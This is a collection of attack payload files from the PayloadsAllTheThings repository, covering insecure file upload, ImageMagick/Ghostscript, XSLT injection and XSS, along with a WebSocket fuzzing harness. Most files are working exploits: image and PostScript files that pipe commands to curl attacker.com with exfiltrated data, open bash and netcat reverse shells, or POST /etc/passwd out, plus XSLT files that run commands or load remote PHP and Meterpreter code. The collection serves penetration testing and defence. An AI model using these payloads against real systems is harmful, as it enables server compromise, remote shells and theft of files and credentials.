-------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.pht: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.phtml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.gif^shell.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.jpeg.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.jpg.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.jpg^shell.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.pgif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Extension PHP/shell.pgif -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.phar: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- 
/Upload Insecure Files/Extension PHP/shell.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.php3: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.php4: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.php5: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.php7: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.phpt: -------------------------------------------------------------------------------- 1 | --TEST-- 2 | echo - basic test for echo language construct 3 | --FILE-- 4 | 8 | --EXPECT-- 9 | This works and takes args! 
-------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.pht: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.phtml: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.png.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.png^shell.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/tiny.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Images/file-upload-mindmap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Images/file-upload-mindmap.png -------------------------------------------------------------------------------- /Upload Insecure Files/Jetty RCE/JettyShell.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | /bin/sh 9 | -c 10 | curl -F "r=`id`" http://yourServer:1337/ 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Compression/GIF_exploit.gif: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture Compression/GIF_exploit.gif -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Compression/JPG_exploit-55.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture Compression/JPG_exploit-55.jpg -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Compression/PNG_110x110_resize_bypass_use_LFI.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture Compression/PNG_110x110_resize_bypass_use_LFI.png -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Compression/PNG_32x32_resize_bypass_use_LFI.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture Compression/PNG_32x32_resize_bypass_use_LFI.png -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Compression/createCompressedPNG_110x110.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Compression/createGIFwithGlobalColorTable.php: -------------------------------------------------------------------------------- 1 | "; 5 | 
$_width=200; 6 | $_height=200; 7 | if(strlen($_payload)%3!=0){ 8 | echo "payload%3==0 !"; exit(); 9 | } 10 | $im = imagecreate($_width, $_height); 11 | $_hex=unpack('H*',$_payload); 12 | 13 | $colors_hex=str_split($_hex[1], 6); 14 | 15 | for($i=0; $i < count($colors_hex); $i++){ 16 | $_color_chunks=str_split($colors_hex[$i], 2); 17 | $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2])); 18 | imagesetpixel($im,$i,1,$color); 19 | } 20 | 21 | imagegif($im,$_file); 22 | ?> -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Compression/createPNGwithPLTE.php: -------------------------------------------------------------------------------- 1 | "; 5 | $_pay_len=strlen($_payload); 6 | if(strlen($_payload)%3!=0){ 7 | echo "payload%3==0 !"; exit(); 8 | } 9 | 10 | 11 | $width=$_pay_len/3; 12 | $height=20; 13 | //$im = imageCreateFromPng("existing.png"); 14 | $im = imagecreate($width, $height); 15 | 16 | $_hex=unpack('H*',$_payload); 17 | $_chunks=str_split($_hex[1], 6); 18 | 19 | for($i=0; $i < count($_chunks); $i++){ 20 | 21 | $_color_chunks=str_split($_chunks[$i], 2); 22 | $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2])); 23 | 24 | imagesetpixel($im,$i,1,$color); 25 | 26 | } 27 | 28 | imagepng($im,"example.png"); -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/convert_local_etc_passwd.svg: -------------------------------------------------------------------------------- 1 | 3 | xmlns="http://www.w3.org/2000/svg"> 4 | 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/convert_local_etc_passwd_html.svg: -------------------------------------------------------------------------------- 1 | 3 | xmlns="http://www.w3.org/2000/svg"> 4 | 5 | 
-------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/ghostscript_rce_curl.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | legal 4 | { null restore } stopped { pop } if 5 | legal 6 | mark /OutputFile (%pipe%curl http://attacker.com/?a=callback) currentdevice putdeviceprops -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagemagick_CVE-2022-44268_convert_etc_passwd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture ImageMagick/imagemagick_CVE-2022-44268_convert_etc_passwd.png -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagemagick_ghostscript_cmd_exec.pdf: -------------------------------------------------------------------------------- 1 | %!PS 2 | currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64) ) 3 | .putdeviceparams 4 | quit -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagemagik_ghostscript_reverse_shell.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | legal 4 | { null restore } stopped { pop } if 5 | legal 6 | mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/127.0.0.1/8080 0>&1') currentdevice putdeviceprops -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg: 
-------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'pango:@/etc/passwd' 4 | pop graphic-context 5 | 6 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'text:/etc/passwd' 4 | pop graphic-context 5 | 6 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | encoding "UTF-8" 3 | viewbox 0 0 1 1 4 | affine 1 0 0 1 0 0 5 | push graphic-context 6 | image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1' 7 | pop graphic-context 8 | pop graphic-context 9 | 10 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | encoding "UTF-8" 3 | viewbox 0 0 1 1 4 | affine 1 0 0 1 0 0 5 | push graphic-context 6 | image Over 0,0 1,1 '|mkfifo /tmp/gjdpez; nc 127.0.0.1 4444 0/tmp/gjdpez 2>&1; rm /tmp/gjdpez ' 7 | pop graphic-context 8 | pop graphic-context 9 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_wget.gif: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 127.0.0.1:1337 
> /dev/null`' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_bind_shell_nc.mvg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://example.com/image.jpg"|nc -l -p 7777 -e"/bin/sh)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_curl.png: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "127.0.0.1)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_portscan.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(http://localhost:PORT/)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_remote_connection.mvg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(http://IP_ATTAQUANT/)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_reverse_shell_bash.mvg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://IP_ATTAQUANT"||/bin/bash -c "ls > 
/dev/tcp/IP_ATTAQUANT/80)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_touch.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://127.0.0.0/oops.jpg"|touch "rce1)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_xml_reverse_shell_nctraditional.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 7 | 9 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | 6 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagetragik2_burpcollaborator_passwd.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context viewbox 0 0 200 200 fill 'url(https://example.123 "|curl -d "@/etc/passwd" -X POST https://xxx.burpcollaborator.net/test1 ")' pop graphic-context -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagetragik2_centos_id.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | legal 4 | { null restore } stopped { pop } if 5 | legal 6 | mark /OutputFile (%pipe%id) currentdevice putdeviceprops -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagetragik2_ubuntu_id.jpg: 
-------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | save 4 | legal 5 | { null restore } stopped { pop } if 6 | { legal } stopped { pop } if 7 | restore 8 | mark /OutputFile (%pipe%id) currentdevice putdeviceprops -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagetragik2_ubuntu_shell.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | save 4 | legal 5 | { null restore } stopped { pop } if 6 | { legal } stopped { pop } if 7 | restore 8 | mark /OutputFile (%pipe%ncat 127.0.0.1 4242 -e /bin/sh) currentdevice putdeviceprops 9 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture ImageMagick/imagetragik2_ubuntu_shell2.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | legal 4 | { null restore } stopped { pop } if 5 | legal 6 | mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1') currentdevice putdeviceprops -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Metadata/Build_image_to_LFI.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | from PIL import Image 3 | 4 | # Shellcodes - Bypass included : Keyword Recognition : System, GET, php 5 | # --- How to use : http://localhost/shell.php?c=echo%20'
';ls
 6 | 
 7 | #shellcode  = ""
 9 | # --- How to use : http://localhost/shell.php?_=system&__=echo%20'
';ls
10 | shellcode2 = ";').($_^'/');?>"
11 | 
12 | 
print("\n[+] Advanced Upload - Shell inside metadatas of a PNG file")

# Build a tiny PNG and stash the PHP payload in its metadata rather than in
# the pixel data.  The shell only survives if the upload handler stores the
# file as-is: anything that re-encodes the image or strips metadata drops it.
print(" - Creating a payload.png")
im = Image.new("RGB", (10,10), "Black")
im.info["shell"] = shellcode
# Info keys the script deliberately does not emit as text chunks
# (presumably the ones Pillow handles itself on save).
reserved = ('interlace', 'gamma', 'dpi', 'transparency', 'aspect')

# PngInfo is not part of Pillow's documented API, but it is what lets us
# attach text chunks when saving.
from PIL import PngImagePlugin
meta = PngImagePlugin.PngInfo()

# Copy every non-reserved info entry into the PNG as a text chunk.  The
# third argument (0) asks for the uncompressed form, so the PHP tags stay
# verbatim in the file and an include() of the image still reaches them.
for key, value in im.info.items():
    if key not in reserved:
        meta.add_text(key, value, 0)
im.save("payload.png", "PNG", pnginfo=meta)

print("Done")


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_echo.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_echo.jpg


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_revshell.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_revshell.jpg


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/PHP_exif_phpinfo.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture Metadata/PHP_exif_phpinfo.jpg


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/PHP_exif_system.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture Metadata/PHP_exif_system.gif


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/PHP_exif_system.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture Metadata/PHP_exif_system.jpg


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/PHP_exif_system.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture Metadata/PHP_exif_system.png


--------------------------------------------------------------------------------
/Upload Insecure Files/Server Side Include/exec.shtml:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Server Side Include/include.shtml:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Server Side Include/index.stm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |   
 5 |     
 6 |     
 7 |   
 8 | 
 9 |   
10 |     
11 |     
12 |   
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/Web Cache Deception/Images/wcd.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Web Cache Deception/Images/wcd.jpg


--------------------------------------------------------------------------------
/Web Sockets/Files/ws-harness.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | from __future__ import print_function
 3 | import socket,ssl
 4 | from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
 5 | from websocket import create_connection, WebSocket
 6 | from urlparse import parse_qs
 7 | import argparse
 8 | import os
 9 | 
# TCP port of the local HTTP front-end that Burp/sqlmap/etc. talk to;
# every GET /?fuzz=... on it becomes one WebSocket round trip.
10 | LOOP_BACK_PORT_NUMBER = 8000
11 | 
def FuzzWebSocket(fuzz_value):
    """Send one fuzzed message over the shared WebSocket and return the reply.

    ``fuzz_value`` is the list that parse_qs() produced for the ``fuzz``
    query parameter; only its first entry is substituted for ``[FUZZ]`` in
    the module-level ``ws_message`` template.  Uses the module-level ``ws``
    connection and does exactly one send followed by one recv, so it
    assumes the server answers each message with a single frame (extra
    frames would be left in the socket and show up on a later request).
    """
    print(fuzz_value)
    payload = ws_message.replace("[FUZZ]", str(fuzz_value[0]))
    ws.send(payload)
    return ws.recv()
17 | 
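def LoadMessage(file):
    """Read the WebSocket message template from ``file`` and return its text.

    Exits the harness with a message when the file is missing or cannot be
    read.  The previous behaviour returned "" for a missing file, which
    silently made every fuzz request send an empty frame (the ``[FUZZ]``
    marker was never substituted) - easy to miss from the Burp side.
    """
    if not os.path.isfile(file):
        print("Message template not found: %s" % file)
        exit()
    try:
        # `with` guarantees the handle is closed even if read() fails.
        with open(file, 'r') as f:
            return f.read()
    except (IOError, OSError):
        print("Error reading file: %s" % file)
        exit()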
29 | 
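class myWebServer(BaseHTTPRequestHandler):
    """HTTP front-end that turns ``GET /?fuzz=VALUE`` into one WebSocket
    round trip, so HTTP-only tools (Burp Intruder, sqlmap, ...) can fuzz
    the socket through the harness.

    The response body is whatever the remote WebSocket server sent back,
    i.e. attacker/target-controlled data.  It is served as text/plain:
    labelling it text/html would let a hostile target run script in the
    tester's browser, on the harness's own origin, if a response is ever
    opened directly.
    """

    def do_GET(self):
        # self.path[2:] strips the leading "/?"; any other path shape is
        # not supported and would be mis-parsed.
        qs = parse_qs(self.path[2:])
        fuzz_value = qs.get('fuzz')
        if not fuzz_value:
            # Answer with a proper 400 instead of letting a KeyError escape
            # the handler, which only shows up as a traceback on the console.
            self.send_response(400)
            self.send_header('Content-type', 'text/plain')
            self.end_headers()
            self.wfile.write("missing 'fuzz' query parameter")
            return
        result = FuzzWebSocket(fuzz_value)
        self.send_response(200)
        self.send_header('Content-type', 'text/plain')
        self.end_headers()
        self.wfile.write(result)
        return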
42 | 
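parser = argparse.ArgumentParser(description='Web Socket Harness: Use traditional tools to assess web sockets')
parser.add_argument('-u','--url', help='The remote WebSocket URL to target.',required=True)
parser.add_argument('-m','--message', help='A file that contains the WebSocket message template to send. Please place [FUZZ] where injection is desired.',required=True)
args = parser.parse_args()

ws_message = LoadMessage(args.message)

# cert_reqs=CERT_NONE: the target's TLS certificate is NOT verified.  That
# is usually what you want when the socket is routed through an
# intercepting proxy, but it also means the harness will talk to anything
# answering on that URL.  http_proxy_host is left empty, which appears to
# disable the proxy; fill it in (and keep port 8080) to go through Burp.
ws = create_connection(args.url,sslopt={"cert_reqs": ssl.CERT_NONE},header={},http_proxy_host="", http_proxy_port=8080)

try:
    # The harness relays anything sent to it straight into the target's
    # WebSocket, so listen on the loopback interface only.  Binding '' would
    # put the fuzzing endpoint on every interface, letting anyone on the
    # network drive the socket with the tester's session.
    server = HTTPServer(('127.0.0.1', LOOP_BACK_PORT_NUMBER), myWebServer)
    print('Started httpserver on port ' , LOOP_BACK_PORT_NUMBER)

    # Block here until Ctrl-C.
    server.serve_forever()

except KeyboardInterrupt:
    print('^C received, shutting down the web server')
    server.socket.close()
    ws.close()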
65 | 


--------------------------------------------------------------------------------
/Web Sockets/Images/WebsocketHarness.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Web Sockets/Images/WebsocketHarness.jpg


--------------------------------------------------------------------------------
/Web Sockets/Images/sqlmap.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Web Sockets/Images/sqlmap.png


--------------------------------------------------------------------------------
/Web Sockets/Images/websocket-harness-start.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Web Sockets/Images/websocket-harness-start.png


--------------------------------------------------------------------------------
/XSLT Injection/Files/enum-system-version-vendor.xsl:
--------------------------------------------------------------------------------
Version: 5 |
Vendor: 6 |
Vendor URL: 7 | 8 | -------------------------------------------------------------------------------- /XSLT Injection/Files/file-write.xsl: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 9 | 10 | Hello World! 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /XSLT Injection/Files/rce-dotnet-2.xsl: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 19 | 20 | 21 | 22 | --- BEGIN COMMAND OUTPUT --- 23 | 24 | --- END COMMAND OUTPUT --- 25 | 26 | -------------------------------------------------------------------------------- /XSLT Injection/Files/rce-dotnet.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 10 | 11 | 12 | 13 | 14 | 15 | 18 | 19 | 20 |
-------------------------------------------------------------------------------- /XSLT Injection/Files/rce-java-1.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /XSLT Injection/Files/rce-java-2.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | . 6 | -------------------------------------------------------------------------------- /XSLT Injection/Files/rce-php-assert.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | include("http://10.10.10.10/test.php") 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /XSLT Injection/Files/rce-php-file-create.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /XSLT Injection/Files/rce-php-file-read.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /XSLT Injection/Files/rce-php-meterpreter.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | eval(base64_decode('Base64-encoded Meterpreter code')) 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /XSLT Injection/Files/rce-php-scandir.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /XSLT Injection/Files/read-and-ssrf.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | Fruits: 8 | 9 | 10 | 11 | - : 12 | 13 | 14 | 
-------------------------------------------------------------------------------- /XSLT Injection/Files/system-properties.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /XSLT Injection/Files/system-properties.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |

5 | Version:
6 | Vendor:
7 | Vendor URL: 8 |

-------------------------------------------------------------------------------- /XSLT Injection/Files/xxe.xsl: -------------------------------------------------------------------------------- 1 | 2 | ]> 3 | 4 | 5 | Fruits &ext_file;: 6 | 7 | 8 | 9 | - : 10 | 11 | 12 | -------------------------------------------------------------------------------- /XSS Injection/Files/InsecureFlashFile.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/XSS Injection/Files/InsecureFlashFile.swf -------------------------------------------------------------------------------- /XSS Injection/Files/JupyterNotebookXSS.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "markdown", 5 | "metadata": {}, 6 | "source": [ 7 | "[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+Cg==)\n" 8 | ] 9 | } 10 | ], 11 | "metadata": { 12 | "kernelspec": { 13 | "display_name": "Python 3", 14 | "language": "python", 15 | "name": "python3" 16 | }, 17 | "language_info": { 18 | "codemirror_mode": { 19 | "name": "ipython", 20 | "version": 3 21 | }, 22 | "file_extension": ".py", 23 | "mimetype": "text/x-python", 24 | "name": "python", 25 | "nbconvert_exporter": "python", 26 | "pygments_lexer": "ipython3", 27 | "version": "3.6.2" 28 | } 29 | }, 30 | "nbformat": 4, 31 | "nbformat_minor": 2 32 | } 33 | -------------------------------------------------------------------------------- /XSS Injection/Files/SVG_XSS1.svg: -------------------------------------------------------------------------------- 1 | </desc><script>alert(1)</script> 2 | -------------------------------------------------------------------------------- /XSS Injection/Files/SVG_XSS2.svg: -------------------------------------------------------------------------------- 1 | 
</foreignObject><script>alert(2)</script> 2 | -------------------------------------------------------------------------------- /XSS Injection/Files/SVG_XSS3.svg: -------------------------------------------------------------------------------- 1 | </title><script>alert(3)</script> 2 | -------------------------------------------------------------------------------- /XSS Injection/Files/SVG_XSS_green_triangle.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 9 | -------------------------------------------------------------------------------- /XSS Injection/Files/SVG_XSS_nested_img_xlink.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /XSS Injection/Files/SVG_XSS_nested_svg.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /XSS Injection/Files/SVG_XSS_nested_use_xlink.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /XSS Injection/Files/SVG_XSS_red_lightning.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | \74k 17 | -------------------------------------------------------------------------------- /XSS Injection/Intruders/port_swigger_xss_cheatsheet_event_handlers.txt: -------------------------------------------------------------------------------- 1 | onafterprint 2 | onafterscriptexecute 3 | onanimationcancel 4 | onanimationend 5 | onanimationiteration 6 | onanimationstart 7 | onauxclick 8 | onbeforecopy 9 | onbeforecut 10 | onbeforeinput 11 | onbeforeprint 12 | onbeforescriptexecute 13 | onbeforetoggle 14 | onbeforeunload 15 | 
